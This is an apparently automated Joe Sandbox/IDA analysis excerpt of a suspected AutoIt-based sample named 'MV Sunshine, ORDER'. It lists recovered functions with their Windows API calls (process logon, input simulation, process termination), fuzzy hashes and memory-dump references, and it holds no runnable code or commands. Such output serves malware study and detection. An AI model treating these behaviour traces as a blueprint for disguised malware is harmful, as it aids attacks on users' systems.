                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                      • String ID:
                      • API String ID: 1827037458-0
                      • Opcode ID: 7d45e2e28359315388ebcea685ef7964115fb0b459eb89d06b28ee4a4aba0091
                      • Instruction ID: 6bd6dbef65b2d9d4271d20c5e03f4fa914eb2eb0e752e2e440066d48cf2c83a6
                      • Opcode Fuzzy Hash: 7d45e2e28359315388ebcea685ef7964115fb0b459eb89d06b28ee4a4aba0091
                      • Instruction Fuzzy Hash: 41419F75504304AFD720EF64CC85FBA7BECEB8A724F140629F994872A1C7719847DB62
                      APIs
                      • ShowWindow.USER32(00A467B0,00000000,015B92B0,?,?,00A467B0,?,00A0B862,?,?), ref: 00A0B9CC
                      • EnableWindow.USER32(00000000,00000000), ref: 00A0B9F0
                      • ShowWindow.USER32(00A467B0,00000000,015B92B0,?,?,00A467B0,?,00A0B862,?,?), ref: 00A0BA50
                      • ShowWindow.USER32(00000000,00000004,?,00A0B862,?,?), ref: 00A0BA62
                      • EnableWindow.USER32(00000000,00000001), ref: 00A0BA86
                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A0BAA9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Show$Enable$MessageSend
                      • String ID:
                      • API String ID: 642888154-0
                      • Opcode ID: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
                      • Instruction ID: 2ba390705f79c03a2d6054ffc2b573f7c03941d0439ba23fd4558a842c52d299
                      • Opcode Fuzzy Hash: 1d2d2dfa055e39aecba2cb29ecb01d63011c29b65900b5be4d55b8d7a1714e23
                      • Instruction Fuzzy Hash: CA416530610249AFDB22CF54DA89B957BE0FF05350F1841B9FA489F6E2C731A856CB71
                      APIs
                      • GetForegroundWindow.USER32(?,?,?,?,?,?,009F5134,?,?,00000000,00000001), ref: 009F73BF
                        • Part of subcall function 009F3C94: GetWindowRect.USER32(?,?), ref: 009F3CA7
                      • GetDesktopWindow.USER32 ref: 009F73E9
                      • GetWindowRect.USER32(00000000), ref: 009F73F0
                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009F7422
                        • Part of subcall function 009E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E555E
                      • GetCursorPos.USER32(?), ref: 009F744E
                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009F74AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                      • String ID:
                      • API String ID: 4137160315-0
                      • Opcode ID: 1f813292b4ab5046690908a1bed014379a6f722983a55c69f855c809e3faadd5
                      • Instruction ID: 29a779762056578578123994c6351f7958fa646b04fb95f4bbb88538228cae91
                      • Opcode Fuzzy Hash: 1f813292b4ab5046690908a1bed014379a6f722983a55c69f855c809e3faadd5
                      • Instruction Fuzzy Hash: 7D31B672509349AFD720DF54DC49F5BBB9AFF88314F004919F585A7191DA30E906CB92
                      APIs
                        • Part of subcall function 009D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D8608
                        • Part of subcall function 009D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D8612
                        • Part of subcall function 009D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D8621
                        • Part of subcall function 009D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D8628
                        • Part of subcall function 009D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D863E
                      • GetLengthSid.ADVAPI32(?,00000000,009D8977), ref: 009D8DAC
                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009D8DB8
                      • HeapAlloc.KERNEL32(00000000), ref: 009D8DBF
                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 009D8DD8
                      • GetProcessHeap.KERNEL32(00000000,00000000,009D8977), ref: 009D8DEC
                      • HeapFree.KERNEL32(00000000), ref: 009D8DF3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                      • String ID:
                      • API String ID: 3008561057-0
                      • Opcode ID: 70b4fd491f1f3de6c15f82f6c239726936bb2835c0f0ff83c1872c491e4557ff
                      • Instruction ID: 062687e90472bd4a5a45394241c64b064e9946557dd90ba6b6c51090c9c88e63
                      • Opcode Fuzzy Hash: 70b4fd491f1f3de6c15f82f6c239726936bb2835c0f0ff83c1872c491e4557ff
                      • Instruction Fuzzy Hash: 8611CD31540609FFDB20DFA4CC48BAF777EEB54315F10812AE885A36D1DB319902CB60
                      APIs
                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009D8B2A
                      • OpenProcessToken.ADVAPI32(00000000), ref: 009D8B31
                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009D8B40
                      • CloseHandle.KERNEL32(00000004), ref: 009D8B4B
                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009D8B7A
                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 009D8B8E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                      • String ID:
                      • API String ID: 1413079979-0
                      • Opcode ID: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
                      • Instruction ID: ec38f5719dbf6f9d33786cd5bf8a21ab2dbe7b12db9e89e1d4b9396fa6337773
                      • Opcode Fuzzy Hash: d8b3ea5eb5b0fd318c3c5a1040314609996bcc933fdc71612b1342dad169b1ed
                      • Instruction Fuzzy Hash: 65114AB254020DAFDB11CFA4DD49FDA7BADEB08704F048066FE04A2161C6759D629B61
                      APIs
                        • Part of subcall function 009812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0098134D
                        • Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098135C
                        • Part of subcall function 009812F3: BeginPath.GDI32(?), ref: 00981373
                        • Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098139C
                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A0C1C4
                      • LineTo.GDI32(00000000,00000003,?), ref: 00A0C1D8
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A0C1E6
                      • LineTo.GDI32(00000000,00000000,?), ref: 00A0C1F6
                      • EndPath.GDI32(00000000), ref: 00A0C206
                      • StrokePath.GDI32(00000000), ref: 00A0C216
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                      • String ID:
                      • API String ID: 43455801-0
                      • Opcode ID: 35ded4c0eb88f4996977c77afd098bd866b2685a3169540894308e44ad4da331
                      • Instruction ID: a258ab04aacfcbdc03a64f105634eddc8a37566894aba1b9a5afbdd514e6b4bb
                      • Opcode Fuzzy Hash: 35ded4c0eb88f4996977c77afd098bd866b2685a3169540894308e44ad4da331
                      • Instruction Fuzzy Hash: 0111097644010CBFDB11DF90DC88FEA7FADEB09364F048121BA185A5A1D7729D56DBA0
                      APIs
                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A03D3
                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 009A03DB
                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A03E6
                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A03F1
                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 009A03F9
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 009A0401
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Virtual
                      • String ID:
                      • API String ID: 4278518827-0
                      • Opcode ID: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
                      • Instruction ID: a7273e61a10b47488e283bb1f6cc550f1e132c8221c3aafd248b3b1757c1de98
                      • Opcode Fuzzy Hash: 46838979a6bf481e4e09cfb53bec2aab8c08281ed45ddda560dfae4b42c0eb69
                      • Instruction Fuzzy Hash: 97016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009E569B
                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009E56B1
                      • GetWindowThreadProcessId.USER32(?,?), ref: 009E56C0
                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E56CF
                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E56D9
                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E56E0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                      • String ID:
                      • API String ID: 839392675-0
                      • Opcode ID: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
                      • Instruction ID: b3ed2838d224970dd3ab897d21669de177495a8ab29daf76465bffc86e4610f7
                      • Opcode Fuzzy Hash: 0b568bb36dc16b49dc1b0f2f0c8aa2b20061e6266dbe5e1d41b3347878512139
                      • Instruction Fuzzy Hash: CEF01D3264115CBFE7319BA29C0DEAB7A7CEBC6B11F000169FA04E14509AA11A0386B5
                      APIs
                      • InterlockedExchange.KERNEL32(?,?), ref: 009E74E5
                      • EnterCriticalSection.KERNEL32(?,?,00991044,?,?), ref: 009E74F6
                      • TerminateThread.KERNEL32(00000000,000001F6,?,00991044,?,?), ref: 009E7503
                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00991044,?,?), ref: 009E7510
                        • Part of subcall function 009E6ED7: CloseHandle.KERNEL32(00000000,?,009E751D,?,00991044,?,?), ref: 009E6EE1
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7523
                      • LeaveCriticalSection.KERNEL32(?,?,00991044,?,?), ref: 009E752A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                      • String ID:
                      • API String ID: 3495660284-0
                      • Opcode ID: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
                      • Instruction ID: 6d118d082900d6fe09d57dd1454c53a43cdc333dd0881ec2b14283ffca08b97b
                      • Opcode Fuzzy Hash: 320d3c6eaae284c4c0ebade1a5c513c69d64745bcd54911e396e9071a0526378
                      • Instruction Fuzzy Hash: F1F0547A140716EFD722ABA4FC8CADB7729EF49302B000531F202A14B5CB755813CB60
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009D8E7F
                      • UnloadUserProfile.USERENV(?,?), ref: 009D8E8B
                      • CloseHandle.KERNEL32(?), ref: 009D8E94
                      • CloseHandle.KERNEL32(?), ref: 009D8E9C
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 009D8EA5
                      • HeapFree.KERNEL32(00000000), ref: 009D8EAC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
                      • Instruction ID: f0523ea54fac843d97d24ce1705c4a6e566ef04e40b6161c6682d1d7396013e7
                      • Opcode Fuzzy Hash: f109efafab58773bbb0a2b621f8c70ffa700fc6e8e91aec7fe8e7a0877dbac57
                      • Instruction Fuzzy Hash: 49E0C236004209FFDA119FE1EC0C90ABB79FB89722B108230F329A5870CB329463DB91
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 009F8928
                      • CharUpperBuffW.USER32(?,?), ref: 009F8A37
                      • VariantClear.OLEAUT32(?), ref: 009F8BAF
                        • Part of subcall function 009E7804: VariantInit.OLEAUT32(00000000), ref: 009E7844
                        • Part of subcall function 009E7804: VariantCopy.OLEAUT32(00000000,?), ref: 009E784D
                        • Part of subcall function 009E7804: VariantClear.OLEAUT32(00000000), ref: 009E7859
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                      • API String ID: 4237274167-1221869570
                      • Opcode ID: 61dfc0e399254b5db9c59fe4f9abb0fc05e28208d7a5fafed962f7ed6c2ade0f
                      • Instruction ID: c2900af28c16861b6203a1387b47147fa53caeffe27cf1fe179d389ee0c9ff2e
                      • Opcode Fuzzy Hash: 61dfc0e399254b5db9c59fe4f9abb0fc05e28208d7a5fafed962f7ed6c2ade0f
                      • Instruction Fuzzy Hash: C2919D716083059FC710EF24C480A6BBBE4EFC9354F04896EF99A8B361DB31E946CB52
                      APIs
                        • Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9
                      • _memset.LIBCMT ref: 009E3077
                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E30A6
                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E3159
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009E3187
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                      • String ID: 0
                      • API String ID: 4152858687-4108050209
                      • Opcode ID: 83f3b778df226c2c9a925cb31a5351297ca990ff9f07934a07625f1dfdd343c0
                      • Instruction ID: 1d12844ff9cb8726854a9bfe88d80de5b162a147cc4c17c7b075818e55974944
                      • Opcode Fuzzy Hash: 83f3b778df226c2c9a925cb31a5351297ca990ff9f07934a07625f1dfdd343c0
                      • Instruction Fuzzy Hash: 9851B17160C3809ED726DF2AC849B6BB7E8EF96360F04892DF895D3191DB70CE458792
                      APIs
                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DDAC5
                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009DDAFB
                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009DDB0C
                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009DDB8E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: ErrorMode$AddressCreateInstanceProc
                      • String ID: DllGetClassObject
                      • API String ID: 753597075-1075368562
                      • Opcode ID: 85ce6af24a6c75b9ecdbe186c55a7d35fb3bd825677ade840cbeec991349326a
                      • Instruction ID: 2cebb63cfef1d1083d249c3877dda68f44056702bf0f2e6c5ee2546f714bf77f
                      • Opcode Fuzzy Hash: 85ce6af24a6c75b9ecdbe186c55a7d35fb3bd825677ade840cbeec991349326a
                      • Instruction Fuzzy Hash: 6A419BB1641208EFDB14CF64C884BAABBA9EF48354F11C1ABAD059F305D7B4DA44CBA0
                      APIs
                      • _memset.LIBCMT ref: 009E2CAF
                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009E2CCB
                      • DeleteMenu.USER32(?,00000007,00000000), ref: 009E2D11
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A46890,00000000), ref: 009E2D5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem_memset
                      • String ID: 0
                      • API String ID: 1173514356-4108050209
                      • Opcode ID: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
                      • Instruction ID: 13a64a9090823b66f6d8f543c1ba6064476d78399c212c771fcbe6d42b35e7b7
                      • Opcode Fuzzy Hash: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
                      • Instruction Fuzzy Hash: 7A419D30204382AFD725DF25DC44B1ABBECAF85320F14465DEA65972E1D770ED45CB92
                      APIs
                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FDAD9
                        • Part of subcall function 009879AB: _memmove.LIBCMT ref: 009879F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: BuffCharLower_memmove
                      • String ID: cdecl$none$stdcall$winapi
                      • API String ID: 3425801089-567219261
                      • Opcode ID: 1cee52fadb448a977046b74a58fb8b69cea7d34fac200c8e97de2380a48109ec
                      • Instruction ID: 6758584daf8de2ce276932ff798930bd6e3159a72859ffd7e877efc6391dc9ff
                      • Opcode Fuzzy Hash: 1cee52fadb448a977046b74a58fb8b69cea7d34fac200c8e97de2380a48109ec
                      • Instruction Fuzzy Hash: 5731907150421AABCF14EF94C881ABEB3B5FF85310B108A29E965A77D1CB71E906CB80
                      APIs
                        • Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82
                        • Part of subcall function 009DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 009DB0E7
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009D93F6
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009D9409
                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 009D9439
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove$ClassName
                      • String ID: ComboBox$ListBox
                      • API String ID: 365058703-1403004172
                      • Opcode ID: e87a5d078d1d3307eaff56d8299239e580a92d934983da15c52873aa8bdb5dc5
                      • Instruction ID: 9e2b3a069d04d53f284f7bbaf65d8d9f817cdd31d055eb2e251650c5897cafce
                      • Opcode Fuzzy Hash: e87a5d078d1d3307eaff56d8299239e580a92d934983da15c52873aa8bdb5dc5
                      • Instruction Fuzzy Hash: EB21E171940108BEDB14BBB0DC859FFB76CEF85760F10862AF925A73E1DB354A4B9620
                      APIs
